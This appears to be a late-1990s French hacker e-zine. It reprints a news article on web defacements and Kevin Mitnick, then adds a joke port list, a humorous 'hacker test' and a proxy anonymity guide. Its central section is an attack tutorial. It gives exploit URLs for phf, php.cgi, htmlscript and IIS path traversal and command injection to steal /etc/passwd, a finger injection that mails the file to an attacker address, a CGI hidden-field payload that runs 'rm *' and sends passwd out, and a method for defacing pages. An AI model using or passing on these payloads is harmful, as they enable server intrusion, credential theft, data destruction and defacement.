Jim Settle, former chief of the FBI's computer crimes squad and now an Internet security consultant, calls the FBI strike ``an out-and-out declaration of electronic warfare.'' 
For some, it's a war that can't afford to be lost. The feeble network that once was the domain of a few scientists is now a robust and far-reaching behemoth that caters to hundreds of millions of people, some of whom pay their taxes, buy goods and send intensely personal information through their computers. 
In the wrong hands, such information could prove embarrassing or costly. Seen in its most sinister light, computer intrusion is a threat to national security. 
But the self-proclaimed ``warriors'' who carried out the recent attacks against government Web sites hardly sound like cyberspace shock troops. 
Their loose-knit groups bear names like the ``Keebler Elves,'' the ``Masters of Downloading'' and ``Hacking for Girlies.'' 
When they hack sites, they traditionally leave behind inane scrawlings - ``Boo! Did we scare you?'' - and ``shout-outs'' to their friends. 
Those familiar with the hacking subculture say such groups are generally composed of teens - and occasionally people in their early 20s - with a lot of computer equipment and too much time on their hands. 
``These are just immature kids doing this from their home computers,'' said John Vranesevich, founder of Anti-Online, a group that tracks hacker activity and that has compiled dossiers on 6,000 hackers. ``It's a game to them. They make a move, and they can't contemplate how it affects people in the real world. It's not reality until the FBI bangs on their door.'' 
Vranesevich called the recent wave of attacks a ``temper tantrum'' over the May FBI raids, in which agents confiscated computer equipment and questioned teens in 11 cities, including Houston, Seattle and San Diego. A spokeswoman for the FBI in Boston said the New England office was not involved in the operation. 
Those who deface Web sites - about 1,300 sites have been defaced so far this year, according to the most reliable statistics - justify their actions by arguing they're actually doing companies and organizations a service by pointing out security deficiencies. 
But law enforcement authorities and others who deal with hackers dismiss the argument. 
``I don't buy it,'' said Drew Williams, the founder of an AXENT Technologies' SWAT team to deal with hacker attacks. ``Any hacker group that has not been invited to test security is committing a crime.'' 
That assessment is shared by David Green, deputy chief of the computer crimes and intellectual property section at the Justice Department. 
``This is not just electronic graffiti,'' Green said. ``They're shutting down access to Web sites, sometimes for hours, sometimes for days, and it makes it impossible for people who want access to that Web source to get it.'' 
Moreover, there's far more at risk than down time for Web servers, contends Peter Mell, who conducts hacker research for the National Institute of Standards and Technology, a division of the U.S. Commerce Department. 
``Real harm can be done,'' Mell said. ``A lot of people download their tax forms from the IRS today. What if someone broke into the IRS Web server and changed just a single number? It would cause supreme chaos.'' 
Mell also pointed to electronic banking and stock trading, saying Web servers today handle increasing amounts of sensitive information. 
``This isn't child's play anymore,'' he said. ``I pay my bills online. I trade stocks online. In that kind of environment, I can't afford people breaking into computers.'' [Nd MadDany : ben qu'est-ce tu veux y en aura toujours des plus forts que toi]
The FBI heartily agrees, though it has not characterized its crackdown on hackers in quite the grandiose terms that hackers do. 
``We don't have a war against hackers. We're following our mandate, which is to investigate violations of federal law,'' said Bill Carter, a spokesman for the FBI's headquarters in Washington. ``The fact that these hackers or hacker groups have their noses out of joint over this, we can't help that.'' 
Most hackers are not caught, but the recent raids suggest the FBI is starting to get better at tracking them. The agency has about 500 open computer crimes cases at any given time. 
But the federal agents' methods - charging in with warrants and bulletproof vests - worries some in the hacking community. 
``For those of us in the scene for a number of years, it's starting to get scary only because we worry it's going to turn into a witch hunt,'' said Space Rogue, a member of the Boston-area group L0pht Heavy Industries, a former hacker clan that now bills itself as an electronic think tank. 
``While defacements will probably continue no matter what law enforcement officials do, it would be very easy for the government to just start executing search warrants left and right, seizing computers and scaring people half to death.'' 
Internet watchdogs - and some hackers themselves - say that while the crackdown should continue, the real issue is computer security. 
Space Rogue argues that nearly all Web page defacements are carried out with known security flaws in software. As an example, he said, his group e-mailed the Army's webmaster about a flaw in its ColdFusion server software a month before someone used the hole to hack into the Army's Web site. 
``It comes down to the person in charge of the machine and whether they're taking their security seriously,'' Space Rogue said. ``This sort of thing never should have happened in the first place.'' 
Settle, the former FBI computer crimes chief, says the danger will be far greater when those doing the hacking aren't teens out for kicks but terrorists intent on electronic warfare. 
``Our computer systems today are like cars operating without safety equipment: no headlights, no bumpers, no airbags, no roofs,'' he said. ``Heck, if teenagers can do this, what can sophisticated intelligence operatives do? This is just a taste of things to come.'' 
The government acknowledges as much. 
In testimony before a congressional panel, government security experts said government computers are easy marks because employees lack training, because well-trained staff flee for the bigger paycheck of the private sector and because internal security procedures often aren't followed. 
``Most federal agencies continue to lack the ability to detect against and recover from cyber attacks,'' U.S. Rep. Connie Morella (R-Md.), chair of the House Science Subcommittee on Technology, said at the June 23 hearing. 
To combat the deficiency, the Clinton administration last week proposed spending $1.5 billion in the next fiscal year on a sophisticated intruder warning system that would be installed on military, government and private-sector computer networks by 2003. [Nd MadDany : il bluffe il le fera pas... enfin on a plus qu' esprer...]
Operating something like a burglar alarm, the system would detect break-ins, funneling that information to a central location. 
``A concerted attack on the computers of any one of our key economic sectors or governmental agencies could have catastrophic effects,'' Clinton wrote in a draft cover letter accompanying the proposal. 
Civil libertarians and Internet privacy watchdogs already have protested the plan, saying it will give the government unprecedented surveillance powers, equipping authorities with the tools to peruse the private dispatches of the masses. 
House Majority Leader Dick Armey (R-Texas) joined in the criticism, deriding the plan as an opportunity for ``government peeping toms.'' 
No matter the government response, hackers will, no doubt, continue mounting challenges, probing for deficiencies in networks and deriding those who chase them. 
``You can stop one, but you can not stop all,'' hackers wrote when they defaced the U.S. Senate Web page for the second time in late June. 
A more recent defacement of an obscure Venezuelan Web page repeated the theme, carrying a ``call to arms'' imploring competing hacker groups to unite to ``win this war.'' 
``Remember, this is our world, not the government's,'' the page read. 
Time will tell. 
Prosecuted `cracker' a martyr to techies 
In hacker circles, he is a modern-day martyr, a technological tinkerer whose attacks on other people's computers amounted to harmless exploration before the FBI swooped down on him, dubbing him Online Enemy No. 1. 
To prosecutors and to judges, he is a dangerous miscreant whose ability to crack computer systems and whose propensity for running from the law required that he be held without bail. 
Kevin Mitnick, for four years the cause celebre of the Internet's dark side, could soon be going free. 
Mitnick, 35, who pleaded guilty in March to multiple counts of computer and wire fraud for breaking into systems and stealing software from such companies as Sun Microsystems [Nd MadDany : les dveloppeurs du langage Java], Novell, Motorola and Nokia, will be sentenced Aug. 9 under a plea agreement that could, with good behavior credits, allow him to leave federal prison within weeks. 
``Kevin is optimistic that this case will be over and that he can get on with his life,'' said Mitnick's lawyer, Donald C. Randolph of Santa Monica, Calif. 
But even if Mitnick himself fades into obscurity, his cause is unlikely to follow. In the hacking community, Mitnick long ago became a symbol of what hackers term gross government over-reaction, a theme repeatedly hammered home by Randolph. 
``The government prosecution of Mr. Mitnick was to carry out an agenda launched by them in the 1990s,'' Randolph said. 
``The government wanted to demonstrate they were going to be tough on computer terrorism. Unfortunately, the government did not have a bonafide computer terrorist to prosecute, so they went after Mr. Mitnick, a recreational hacker who was arrested with a big splash and who became a convenient target.'' 
Randolph's comments could be dismissed as the arguments of a defense lawyer looking to gain sympathy for his client, but he's not the only one making them. 
Drew Williams, who founded Axent Technologies' SWAT team to respond to hacking incidents for clients, said the government miscalculated with Mitnick. 
``I am not a Mitnick supporter at all. However, I think the government did in fact set out to make an example and instead made a martyr,'' Williams said. ``An individual's rights to due process probably got a little trampled.'' 
Denied bail on charges that could have initially landed him in jail for a century, Mitnick appealed all the way to the U.S. Supreme Court, where the justices declined to hear his lawyer's argument that bail should be set. 
Hackers have seized on the bail issue, leaving ``Free Kevin'' messages on the Web sites they hack. Recent examples include the home pages of the U.S. Senate and Greenpeace, where hackers left the tongue-in-cheek message ``Free Mitnick or we will club 600 baby seals.'' 
There is also a ``Free Kevin'' Web site (www.freekevin.com) that gives Mitnick updates and carries a confinement clock showing - to the second - how long Mitnick has been jailed. 
Randolph argues that while people should be prosecuted for breaking into systems, the law needs to be refined to distinguish between recreational hackers and information terrorists. 
``I do not quarrel at all with the government's right to prosecute computer fraud and to go after computer terrorists, but it's high time they distinguish between high crimes and misdemeanors so they're not trumpeting the arrest of the century when the suspect is a kid on a laptop,'' Randolph said. 
Mitnick's prosecutors insist they have not overreached, that Mitnick caused millions in damage by stealing and changing information in computer systems. 
``This is someone whose conduct over a 2-year period was very broad and very serious,'' Assistant U.S. Attorney Christopher Painter said. ``He hit a huge number of companies with a lot of damage. He is not the victim.'' 
If Mitnick does win his freedom soon, it could be short-lived. The Los Angeles County District Attorney's Office is preparing its own case against him on charges similar to the federal claim. 
Randolph said he's confident Mitnick, in the end, will prevail. 
``In 1995, the press and the public were fooled into thinking Kevin Mitnick was this cyber bogeyman,'' he said. ``That type of argument doesn't fly in 1999. People know better.'' 
Sites that have been targeted 
Here's a partial list of Web sites that have been attacked in recent months. In most cases, the sites were defaced. In others, a flood of requests for service overwhelmed Web servers, rendering them unusable. In several of the attacks, the intruders called the acts revenge for FBI ``harassment'' of hackers. 
Bell South 
eBay (on-line auctioneer) 
FBI 
Fort Monmouth (N.J.) U.S. Army Garrison 
Georgetown University 
Harvard University 
Idaho National Engineering and Environmental Laboratory (conducts research for the U.S. Department of Energy) 
Illinois Comptroller's Office 
NASA Goddard Space Flight Center 
National Oceanic and Atmospheric Administration Storm Prediction Center 
State of Virginia home page 
University of California-Davis 
University of Colorado 
University of Michigan 
University of Wisconsin 
U.S. Army main Web site 
U.S. Coast Guard 
U.S. Department of Agriculture 
U.S. Department of Education 
U.S. Department of the Interior 
U.S. Department of Labor 
U.S. Information Agency 
U.S. Navy 
U.S. Senate (twice) 
The White House 
-----------------------------------------------------------------

Voil...On comprend mieux aprs ca pourquoi ca fout les boules
aux entreprises et aux gouvernements...
(Je l'ai pas traduit...dsol, pas le temps mais si quelqu'un veux
me le traduire, j'attends...)
[Nd MadDany : t'es pas fou t'as vu la taille ? :o)]

========================================================================
                      LISTE DES PORTS Par MADDANNY !!!
========================================================================
Connecting...
Time out, retrying...
Connected

--->>> Les ports tcp les plus connus, by MadDany <<<---

Loading....
Type your commands here : list
Command OK
Loading list...

Port       Service
7          echo
9          discard
11         systat
13         daytime
15         netstat
17         qotd
19         chargen
20         ftp-data
21         ftp
23         telnet
25         smtp
37         time
42         name
43         whois
53         nameserver
57         apts
59         apfs
77         rje
79         finger
80         http
87         link
95         supdup
100        newacct   [usage interdit]
101        hostnames
102        iso-tsap
103        x400
104        x400-snd
105        csnet-ns
109        pop2
110        pop3
111        sunrpc
113        auth
115        sftp
117        uucp-path
119        nntp
123        ntp
133        statsrv
136        profile
144        news
170        print-srv
443        https
512        exec
513        login
514        cmd
515        printer
520        efs
526        tempo
530        courier
531        conference
532        netnews
540        uucp
543        klogin
544        kshell
555        dfs
556        remotefs
562        chshell
570        meter
600        pcserver
607        nqs
666        mdqs
750        rfile
751        pump
752        qrh
753        rrh
754        tell
758        nlogin
759        con
760        ns
761        rxe
762        quotad
763        clycleserv
764        omserv
765        webster
767        phonebook
769        vid
771        rtip
772        cycleserv2
773        submit
774        rpasswd
775        entomb
776        wpages
780        wpgs
800        mdbs
801        device
997        maitrd
998        busboy
999        garcon
1025       blackjack
1347       bbn-mmc
1348       bbn-mmx
1524       ingreslock
1525       orasrv
1600       issd
1650       nkd
2001       dc
2004       mailbox
2005       berknet
2006       invokator
2007       dectalk
2008       conf
2009       news
2010       search
2011       raid-cc
2012       tty-info
2013       raid-am
2014       troff
2015       cypress
2017       cypress-stat
2018       terminaldb
2019       whosockami
2021       servexec
2022       down
2025       ellpack
2027       shadowserver
2028       submitserver
2030       device2
2032       blackboard
2033       glogger
2034       scoremgr
2035       imsldoc
2038       objectmanager
2040       lam
2041       interbase
2042       isis
2044       rimsl
2047       dls
2048       dls-monitor
2049       shilp
3049       nsws
4672       rfa
5000       complexmain
5001       complexlink
5236       padl2sim
6666       complete-write/read-access
9535       man

List loaded
Type your commands here : open port 6666
Command OK
Are you sure ? This will give you complete access to the server y/n : y
Command OK
Fuck you lamer, disconnecting...
Disconnected



[note de MadDany : c'est une blague le port 6666, essayez pas de vous y connecter 
comme un gros lame pendant des heures, pas comme le dbile du texte...]

========================================================================
                  HACK DE SERVEUR WEB avec votre BROWSER
========================================================================

Hacker un serveur, mais pourquoi faire ?
Hacker un serveur est pour The Underground Angels l'occupation principale
afin de faire passer nos ides...
C'est donc trs utile mais pour cela, il faut les passwords...
Rien de plus simple avec ces quelques bugs de rcuprer les fichier passwd
et shadow gnralement ds le rpertoire /etc/
Il suffit ensuite de faire marcher son pc avec un crackeur comme John The Ripper.

Voici la liste:

                                  HTTP - htmlscript
SERVICE: http 

BUG: Htmlscript (www.htmlscript.com) vous autorise l'acces aux fichiers systemes du serveur. 

IMPACT: Les utilisateurs sans droits peuvent via leur navigateur lire n'importe quel fichier systeme du serveur. 

EXEMPLE:
           Il suffit de taper:
           http://www.victime.com/cgi-bin/htmlscript?../../../../../etc/passwd
           Le nombre de repertoires est lie bien sur a l'emplacement du fichier "passwd" ou du
           fichier que vous voulez lire et aussi de l'emplacement du repertoire "CGI-BIN". 



                                      HTTP - phf 

SERVICE: http 

BUG: Le script phf distribue avec le serveur http NCSA, version NCSA/1.5a et anterieures ainsi que le serveur Apache anterieure a la version 1.0.5 ne filtrent pas certaines requtes 

IMPACT: Via le WEB les utilisateurs peuvent executer certaines commandes par l'intermediaire du daemon http 

HISTORIQUE: Le bug a ete decouvert le 12 mars 1996 Une liste de serveurs est disponible par l'intermediaire de commandes speciales de ALTA VISTA

EXEMPLE:
           http://victime.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
           Cet exemple vous permet de recuperer le fichier /etc/passwd a partir d'un serveur
           vulnerable. 




                                   HTTP - php.cgi
SERVICE: http 

BUG: Voici un bug identique a celui de phf decrit ci dessus 

EXEMPLE:  
           http://victime.com/cgi-bin/php.cgi?/etc/passwd
           Vous permet de recuperer comme le phf le fichier /etc/passwd 




                    HTTP - Microsoft IIS/1.0 pre service pack 3
SERVICE: http 

PROGRAMME: Microsoft internet-Server/1.0 anterieure au pack 3 

BUG: Le serveur autorise certaines commandes en dehors du chemin initial 

IMPACT: Les utilisateurs peuvent prendre le control du serveur :) 

DESCRIPTION:
        Il est possible de recuperer des fichiers et d'executer des commandes en dehors
        du chemin "www" en ajoutant ".." dans le chemin d'acces.
        Dans les exemples suivants le chemin d'acces envisage de IIS est c:\inetsrv et 
        pour Windows NT c:\winn35 
        http://your.host.name/scripts/anyold.cmd?&dir+c:\
        http://your.host.name/scripts/anyold.bat?&dir+c:\
        http://your.host.name/..\..\autoexec.bat
        http://your.host.name/scripts/../../../winnt35/win.ini
        http://your.host.name/scripts/..\..\winnt35\cmd.exe?%2FC+set
        http://your.host.name/scripts/..\..\winnt35\cmd.exe?%2FC+echo+"Hi
        There"+>c:\temp\hello.txt
        http://your.host.name/scripts/..\..\WINNT35\SYSTEM32\XCOPY.EXE?+c:\autoexec.bat+c:\temp



Vous en voulez encore ??

En voici:

                                   FINGER BOX

C'est pour avoir accs au finger d'un site comme hummm, AOL par exemple...
Il suffit de taper l'adresse comme http://www.aol.com et de rajouter:
/cgi-bin/finger  la fin.
Ce qui donne:
Http://www.aol.com/cgi-bin/finger

Voil, si ca marche, vous devez voir apparaitre une boite de dialogue vous demandant le nom
que vous voulez finger. Vous aurez probablement le fichier /etc/passwd dans la foule...
Ensuite, cherchez dans la page les tags 'mailto' (pour les adresses), retournez dans la boite Finger et tapez: nobody@nowhere.org ; /bin/mail moi@hackeur.org < etc/passwd 
                   {Le Neuneu}       {rep. Mail} {mon adresse}  {fichier passwd}

Vous devriez alors recevoir le fichier passwd dans votre boite...

                                     CGI 

Cette partie vous expliquera comment recevoir le fichier /etc/passwd  partir du
formaulaire Cgi de quelqu'un.
Regardez d'abord le source du fichier:
<html><body>
                            <h2>This is a form to go to Modify</h2>
                    <form action = "http://www.aol.com/cgi-bin/doc.pl"  method="get">
                            <input type="hidden" name="myaddress" value="nobody@aol.com">
                    <input type="text" name="input">
                    <input type="submit" value="send">
                    </form>
                    </body></html>

C'est un simple formulaire qui demande  l'utilisateur de rentrer un message
qui sera envoy  un script appel 'doc.pl'
Dans ce script, il y a une ligne qui peut tout changer !!! hahaah
c'est:
system("/usr/lib/sendmail -t $myaddress < $tempfile")

A vous de vous en servir.

Faites votre propre fichier HTML contenant:
<html><body>
                    <h2>Hack AOL</h2>
                    <form action = "http://www.aol.com/cgi-bin/doc.pl" method = "get">
                    <input type="hidden"  name="myaddress"
                        value=" ; rm * ;mail -s file tonaddresse@tua.com <                      /etc/passwd;">
                    <input type = "text" name="input">
                    <input type = "submit" value=:"getpasswd">
                    </form></html>

Voil, vous aurez encore le fichier passwd avec cette technique...

                     MODIFIER UN FICHIER HTML

Envie de rajouter une image, du texte etc...dans un fichier html ?
Rien de plus simple:
tapez apres une adresse comme AOL (http://www.aol.com/)
la ligne suivante:

cgi-bin/phf?Qalias=x%0a/bin/echo%20 "Tout ce que vous voulez dire..."%20>>filename.html

Attention de bien employer le language html pour modifier tout ca....


Voil !
Certains bugs ont t corrigs dans les nouvelles versions de ces logiciels... 
Mais bon, il doit en rester quelques uns qui continuent d'utiliser ces logiciels...
Mais sinon, dans, les nouvelles versions qui sortent, il doit srement avoir des bugs
(Surtout chez Kro...)...Envoyez moi vos listes de bugs...

White Angel



========================================================================
          ---///> Da UltImAtE HaCker'Z TeSt, by MadDany <\\\--- 
========================================================================

Bon, on va voir si vous tes un vrai hacker... cette fois vous pourrez pas vous chapper...
Ready ? Go !
[Nd de WA: Repondez par oui ou par non]

001 Avez vous dj rat un rendez-vous parce que vous tiez devant votre ordinateur ?
002 ... rat un mariage ?
003 ... rat votre propre mariage ?

004 Avez vous dj essay de changer la valeur de 4 ? 
005 ... avez vous russi ?

006 Est-ce que vous savez depuis combien de jours vous tes n ?

007 Est-ce que vous avez dj essay de tlcharger une pizza ?

008 Pouvez vous crire avec les valeurs ASCII ?

009 Est-ce que vous pouvez nommer les puissances de 2 suprieures  2!32 ?

010 Est-ce que vous entendez votre ordinateur vous parler ?
011 ... est-ce que vous avez dj agress un de vos amis avec un marteau parce que votre ordinateur vous a dit de le faire ?

012 Est-ce que vous arrivez  reproduire les bruits d'un modem ?
013 ... suprieur  28 Kbps ?

014 Est-ce que vous avez dj essay de parler  votre modem ?
015 ... est-ce qu'il a rpondu ?

016 Est-ce que vous enregistrez les bruits de votre imprimante et appelez a du Techno Industrial Modern Jazz ?

017 Pouvez-vous convertir de l'hexa en octal dans votre tte ?

018 Avez vous regard votre ordinateur d'un oeil bizarre quand vous avez appris qu'il contenait des cookies ?
019 ... avez vous dj essay de le dmonter rien que pour vrifier que c'tait vrai ?
020 ... avez vous pouss un soupir de soulagement en vous rendant compte que c'taient des bobards destins  vous mystifier ?

021 Est-ce que vous avez plus d'un ordinateur ?
022 ... 4 ordinateurs ?
023 ... 16 ordinateurs ?

024 Avez vous un disque dur de plus de 16 mgaoctets ?
025 ... 256 Mo ?
026 ... 1 gigaoctets ?
027 ... 16 Go ?
028 ... 256 Go ?
029 ... 1 teraoctets ?

030 Est-ce que vous avez une bibliothque ?
031 ... avez vous remplac tous les livres par des disquettes ?

032 Avez vous dj refus une promotion parce que votre nouvel ordinateur de bureau tait moins puissant ?

033 Est-ce que vous rcitez les ports de communication dans l'ordre pendant votre sommeil ?

034 Est-ce que vous connaissez plus d'un langage de programmation ?
035 ... plus de 4 ?
036 ... plus de 16 ?
037 ... plus de 32 ?
038 ... est-ce que vous rvez dans un de ces langages ?

039 Est-ce que vous avez dj cr un langage de programmation ?

040 Avez vous dj crash un systme ?
041 ... tait-ce fait exprs ?

042 Est-ce que vous connaissez des vrais gens qui arrivent  parler sans clavier ?
043 ... plus d'une personne ?
044 ... plus de 2 personnes ???

045 Est-ce que vous avez fait vos lacets ?

046 Est-ce que vous arrivez  communiquer normalement avec des trangers ?

047 Est-ce que vous voyez les objets tridimensionnels en mode fil de fer ?
048 ... est-ce que vous trouvez a normal ?

049 Est-ce que vous dcorez votre frigo avec des disquettes ?

050 Avez-vous dj demand  votre mdecin de vous faire un scandisk ?
051 ... est-ce qu'il vous a envoy  la place chez des gens habills en blanc qui vous ont prt une jolie chemise et fait des piqres ?

052 Avez vous dj crit un programme quelconque ?
053 ... un compilateur ?
054 ... un virus ?
055 ... un prophylactique ?

056 Avez-vous d crit un programme qui s'est excut correctement du premier coup ?
057 ... est-ce que le code faisait plus de 20 lignes ?
058 ... plus de 100 lignes ?
059 ... est-ce que vous pouvez le rciter  l'envers ?

060 Avez vous dj calcul un nombre premier de plus de 100 chiffres ?

061 Est-ce que vous pouvez rciter toutes les couleurs des boxes et leurs fonctions ?
062 ... est-ce que votre tlphone ressemble encore  quelque chose ?

063 Avez-vous dj pass plus de dix minutes  chercher une erreur de frappe dans un fichier source ?
064 ... plus d'une heure ?
065 ... plus d'un jour ?
066 ... plus d'une semaine ?
067 ... est-ce que la premire personne a qui vous avez montr la source a trouv l'erreur sur le champ ?
068 ... est-ce que vous avez assomm cette personne avec votre clavier et cach le corps derrire le meuble ?



Voil, je crois qu'avec a vous pourrez valuer votre niveau assez fidlement.... ;^)
[Pour ce texte je me suis pas mal inspir d'un exte anglais, et pis j'ai rajout mes blagues. MadDany]



========================================================================
                         Rester ANONYME sur le Web 
========================================================================

Les sujets sont:
1.Que sont les 'packets'
2.Obtenir un proxy http
3.Comment fonctionne un proxy http
4.Comment scuriser les 'packets' http
5.Comment diter les infos que votre OS et votre browser envoie
6.Obtenir un proxy (socket proxy) fonctionnant sur le socket
7.Comment fonctionne un 'socket proxy'
8.Cookies
9.Conclusion


-------------------------------------------------------------------------
1. Que sont les packets 

Les packets sont utiliss par tous les internautes...C'est vraiment la
notion basique  connaitre...
Les Packets peuvent tre assimil  des messages mis en capsules que le 
serveur et le client s'changent pour se reconnaitre.
Lorsque vous vous connectez  une machine distante, les packets
servent  identifier qui est connect...

Voici un exemple de packet:
[Connect from undergroundangel.cjb.net]
[208.11.17.52] (Mozilla/4.05 [en] (X11;I;Linux 2.0.34 i586) on August 
15, 1999 at 14:34:45

Maintenant, je vais vous expliquer ce que a signifie si vous ne savez pas.
*Note*: Les packets http sont ce que vous utilisez pour envoyer des infos
avec votre browser vers un serveur/Machine/site.

[connected from undergroundangel.cjb.net]-C'est l'Hote
[208.11.17.52]- C'est l'IP
(Mozilla/4.05)- C'est la version de Mozilla utilise (Netscape)
(X11;I;Linux 2.0.32 i586)- C'est mon OS et sa version [Nd MadDany : baaaah du Linux]
[On August 15, 1999  at 14:34:45] - C'est le jour/anne/heure


C'est utilis tout  fait lgalement par des serveur pour savoir qui vous 
tes mais aussi par des Hackers pour mieux vous connaitre..hahaha
Il faut savoir que les proxys ont t invents pour donner une
scurit  l'utilisateur et empecher de connaitre ces informations...
Mais utiliser des proxys anonymes n'est pas  100% fiable, un bon hacker
peut quand mme avoir votre hote/ip..etc mais ca sera plus dur pour lui...
Maintenant, les packet http ne sont pas les seuls, il existe des sockets packets
(Packet de connexion) Mais nous verrons cela + tard...


2.Comment fonctionne un proxy http

Un proxy http fonctionne comme un serveur. vous configurez votre browser
pour qu'il se connecte au proxy lorsque vous voulez voir un site.
Votre browser se connectera donc d'abord au proxy et le proxy se connectera
au site que vous voulez voir...Vous aurez ainsi le site voulu et le serveur
ne verra que l'IP du proxy.

             Moi et mon Ordinateur (je tape: http://www.le_site.com/)
                                     |
                                     |
                                     |
                                    \|/
               Mon Browser internet se connecte tout seul au proxy
                                     |
                                     |
                                     |
                                    \|/
                      Le proxy va sur http://www.le_site.com
                                     |
                                     |
                                     |
                                    \|/
          Le Site.com ne vois que les packets du proxy et pas les votres

Ensuite le proxy vous renvois les pages....
Si le proxy ne fonctionne pas, c'est qu'il n'est plus valable ou mal configur...
Nous verrons comment configurer un proxy plus tard...

[Nd MadDany : je me permets de prciser quelques trucs. Les serveurs proxys sont utiliss dans des grandes entreprises disposant d'un rseau local (LAN) qui veulent mettre leurs ordinateurs sur le rseau Internet. Pour des raisons de scurit videntes ils ne peuvent pas se permettre de fournir une connexion individuelle  chaque machine, ils vont donc connecter les ordinateurs  un serveur proxy qui va faire le lien entre le rseau local et le rseau distant. Ainsi quelle que soit la machine connecte sur un serveur, ce dernier verra le proxy. En pratique lorsque vous vous connectez sur le proxy vous lui donnez des ordres qu'il transmet au serveur sur lequel vous vous connectez, et ensuite le serveur renvoie les informations au proxy, qui vous les transmet  nouveau. Le serveur n'a donc (en thorie) pas connaissance de vos informations personnelles. De plus la connexion est considrablement ralentie par tous ces processus supplmantaires, tant donn qu' aucun moment vous ne crez de connexion TCP (directe) sur le serveur. Voil]
[Nd WA: Merci Mad]

3.Obtenir un proxy Http
Les proxys http sont trs simple  trouver sur le net et sont libres  utiliser...
Il faut juste bien choisir son proxy, dans sa rgion de prfrence pour que la connexion
soit plus rapide...

Je vous aurais bien donn une liste de proxys mais je ne sais pas s'ils fonctionnent
et si ils seront valables longtemps...
Allez voir http://www.proxy4all.com
[Nd MadDany : ou demandez moi]

4. Comment scuriser les packets http

Comme je l'ai dis avant, ceci est un packet classique:
[Connect from undergroundangel.cjb.net]
[208.11.17.52] (Mozilla/4.05 [en] (X11;I;Linux 2.0.34 i586) on August 
15, 1999 at 14:34:45

Maintenant, pour rendre votre ip et votre nom d'hote anonyme, nous allons utiliser
un proxy avec votre browser internet.
Allez dans les options ---> dans la configuration du proxy et rentrez toutes les 
infos necessaires  se configuration du proxy: ftp, http, port...etc
Maintenant, vos packets ressembleront a a:
[Connect from The_proxies_host]
[The_proxies_ip] (Mozilla/4.05 [en] (X11;I;Linux 2.0.34 i586) on august 
15, 1999 at 14:34:45 )

Vous remarquerez  que le serveur connait votre OS.
Je vous expliquerai plus tard comment remdier  a...
Maintenant, vous pensez tre totalement anonyme ...
Mais non, car si un hacker hack le serveur proxy et compare les logs
avec votre heure de connexion, il retrouvera votre IP/Hote.
Mais c'est quand mme un gros boulot de comparer les logs...

[Nd MadDany : certains proxys ne loggent pas les personnes qui se connectent sur eux, comme pour les WINGates (voir plus loin)]

5.Comment diter les infos que votre Browser et votre OS envoie.

Vous pouvez modifier les nom de vos versions de Win etc..dans:

GOTO HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion
ProductName = Microsoft Windows 95
Version = Windows 95


GOTO HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent\Post Platform
(Vos Parametres originaux sont l) = IEAK(Tes parametres originaux) 

Exemple

GOTO HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent\Post Platform
Cool [Unix-Base] = IEAKCool [Unix-Base] 

*Note (Je n'ai rien test alors, je ne sais pas si ca marche...)

[Nd MadDany : pour ceux qui connaissent pas l'diteur du registre, il faut taper "regedit" dans la commande excuter du menu dmarrer de Windows. Ensuite vous cherchez l'arborescence spcifie et vous double cliquez sur l'lment qui nous intresse, et enfin vous modifiez sa valeur dans la case de texte qui apparait. Ouf !]

[Nd WA: On sait jamais, avec ceux qui utilisent nunuX...]

6.Obtenir un socket proxy

Les sockets proxys fonctionnent comme les proxys http  la seule diffrence
qu'ils sont utilis avec des programmes comme Icq ou Mirc et les packets 
sont envoys a travers les sockets et non pas les http. (Vous me suivez toujours ?)
Trouver un socket proxy est plus dur car il est ddi  un programme bien spcifique
et il est limit aux personnes qui l'utilisent.
Http est dj utilis pour toutes sortes d'emplois. Nous auront donc toujours besoin
de serveur proxy.
POUR trouver un socket proxy vous pouvez chercher sur le net (socket proxy)
ou essayer certains noms de programmes comme Icq proxy.
Si tout vas bien, vous aurez un socket proxy qui sera utile pour vous protger
des lames qui jouent avec des nukers..etc.
Et vous ne serez ennuy comme un utilisateur de mirc ou icq  qui ont peut voir
l'IP et le nom d'Hote
Vous me direz...A quoi ca sert de faire ca alors qu'on peut spoofer..
Et l, je vous rponds: "Le Spoof, c'est pas stable, tandis que les proxys
sont stables..."
Il existe beaucoup de sockets proxy...A vous de les trouver en cherchant
sur le net..


7.Comment fonctionne un Socket Proxy.
Quand vous recevez ou envoyez un fichier pour le serveur ou l'utilisateur 
travers le socket, il se passe ceci:
( established a connection on undergroundangel.cjb.net port 1030 )
Et il n'y a pas de log sur l'ordinateur avec l'heure et la date...
C'est pkoi vous avez besoin d'un socket proxy car les hacker peuvent savoir
ce que vous faites...
[Nd MadDany : moi qui croyait que c'tait nous les hackers...]
[Nd WA: Oui mais y'en a qui se familiarise avec le milieu du hacking pour mieux se protger]

8.Cookies

Ok, les cookies une autre manire d'envoyer des infos du serveur/isp
vers votre ordinateur. Les cookies contiennent des infos sur les pages
web que vous avez visit, sur ce que vous avez charg et votre IP/hote 
et date et heure.
Les hackers peuvent utiliser a pour 2 raisons:
1. Obtenir les infos necessaire pour vous hacker
2. Etre capable de savoir tout ce que vous avez fait sans que vous le
sachiez.
Avec votre Browser, vous pouvez stopper les cookies. Allez ds les options.

[Nd MadDany : avec IE 5.0, faites Outils/Options Internet.../Onglet Scurit/Personnaliser le niveau. L vous pourrez contrler les niveaux de scurit des contrles ActiveX, Java, les cookies... Pour effacer ceux qui sont dj contenus dans votre ordi allez faire un tour dans c:/Windows/Temporary Internet Files et c:/Windows/Cookies. Je vous conseille aussi de paramtrer Internet Explorer pour ne pas conserver l'historique des sites que vous visitez (dans le mme menu que tout  l'heure). Les temporary internet files sont trs intressants lorsqu'on veut savoir quels sites vous visitez (on retrouve les bannires, les photos plus ou moins vocatrices...), alors dans les options internet, cliquez sur l'onglet Avances et cochez la case tout en bas (vider le dossier temporary internet files ds que vous fermez le browser)]

Now With all browsers now u can stop even limit cookies from the oriene
of your server.Go to your options u will find something on cookies
there in ya browser.
Now this is very limiting so if ya a linux/unix user there is a nice
little program i know that will go that few steps furture.
Visit. (http://www.lne.com/ericm/cookie_jar/)
THis program called "Cookie jar" alows u to limit sites from your computer
limit if u get cookies from that site/server its goes the extra steps
u need.

9.Conclusion

Bon, voil... C'est un document en anglais que j'ai traduit...
Y'a des lacunes et quelques erreurs mais bon...Ca a surement
claircit les newbies dans le domaine des proxys...


White Angel


========================================================================
